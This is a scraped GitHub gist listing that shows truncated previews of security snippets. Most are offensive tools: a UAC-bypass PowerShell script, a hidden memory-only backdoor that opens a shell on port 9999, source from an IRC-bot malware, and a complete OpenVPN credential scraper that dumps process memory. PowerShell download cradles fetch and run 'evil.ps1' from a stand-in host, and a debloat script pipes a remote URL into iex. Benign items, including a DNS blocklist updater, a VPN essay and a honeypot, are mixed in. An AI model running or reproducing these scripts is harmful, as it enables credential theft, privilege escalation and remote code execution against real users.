Skip to content

Instantly share code, notes, and snippets.

View g0tmi1k's full-sized avatar

g0tmi1k g0tmi1k

3.4k followers · 9 following
View GitHub Profile
@DiabloHorn
DiabloHorn / pe-aware-split.py
Created November 12, 2017 17:47
Split file while preserving PE format
#!/usr/bin/env python
# DiabloHorn https://diablohorn.com
# blank out bytes taking into account the PE file format
# input file: base64 malware.exe | rev > enc.txt
import sys
import os
#pip install pefile
import pefile
import argparse
import logging
@tyranid
tyranid / bypass_uac.ps1
Last active July 11, 2024 12:27
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.
Import-Module NtObjectManager
@13Cubed
13Cubed / update_dnsbl.sh
Last active October 23, 2020 06:55
Download DNS adware and malware blacklists in BIND format and add them to a blacklist zone file. This is a modified version of the script from Paul's Security Weekly (http://wiki.securityweekly.com/wiki/index.php/Episode472).
#!/bin/bash
HOME=/var/named
ADLISTURL="https://pgl.yoyo.org/adservers/serverlist.php?hostformat=bindconfig;showintro=0;mimetype=plaintext"
MWLISTURL="http://mirror1.malwaredomains.com/files/spywaredomains.zones"
ADLISTFILE=/tmp/adlistfile
MWLISTFILE=/tmp/mwlistfile
# Download newest blacklists
curl -s -o $ADLISTFILE $ADLISTURL
@epinna
epinna / pypest.py
Last active September 4, 2023 02:13
Hackish one-liner memory-only backdoor agent which hides from ps
#!/usr/bin/env python
# This script prints a simple one-liner memory-only backdoor agent which hides from ps.
# It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite
# and spawns a shell on port 9999. Just an experiment, there are simplest way to run unnoticed in the
# process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre)
template = """
import sys,re,pty,os,socket
@alirobe
alirobe / reclaimWindows10.ps1
Last active August 22, 2025 19:37
This Windows 10 Setup Script turns off a bunch of unnecessary Windows 10 telemetery, bloatware, & privacy things. Not guaranteed to catch everything. Review and tweak before running. Reboot after running. Scripts for reversing are included and commented. Fork of https://github.com/Disassembler0/Win10-Initial-Setup-Script (different defaults). N.…
###
###
### UPDATE: For Win 11, I recommend using this tool in place of this script:
### https://christitus.com/windows-tool/
### https://github.com/ChrisTitusTech/winutil
### https://www.youtube.com/watch?v=6UQZ5oQg8XA
### iwr -useb https://christitus.com/win | iex
###
### OR take a look at
### https://github.com/HotCakeX/Harden-Windows-Security
@kurobeats
kurobeats / man.cy
Created February 21, 2016 09:00
man.cy from malicious Linux Mint iso
#define STARTUP 1
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apt-cache" // What you want this to hide as
#define CHAN "#mint" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=5; // Must change this to equal number of servers down there
char *servers[] = {
"updates.absentvodka.com",
"updates.mintylinux.com",
"eggstrawdinarry.mylittlerepo.com",
@joepie91
joepie91 / vpn.md
Last active August 23, 2025 16:34
Don't use VPN services.

Don't use VPN services.

No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.

Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.

  • A Russian translation of this article can be found here, contributed by Timur Demin.
  • A Turkish translation can be found here, contributed by agyild.
  • There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.
@rvrsh3ll
rvrsh3ll / openvpnScraper.sh
Last active January 24, 2022 14:35
#!/bin/bash
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag
pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}')
echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done
echo "Your credentials should be listed below as username/password"
strings *.dump | awk 'NR>=3 && NR<=4 { print }'
rm *.dump --force
@glaslos
glaslos / demo_web_honeypot.py
Last active March 23, 2016 23:38
demo_web_honeypot
import SimpleHTTPServer
import SocketServer
paths = set()
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# Detect remote file inclusion
if '=http' in self.path:
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active August 20, 2025 17:20
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object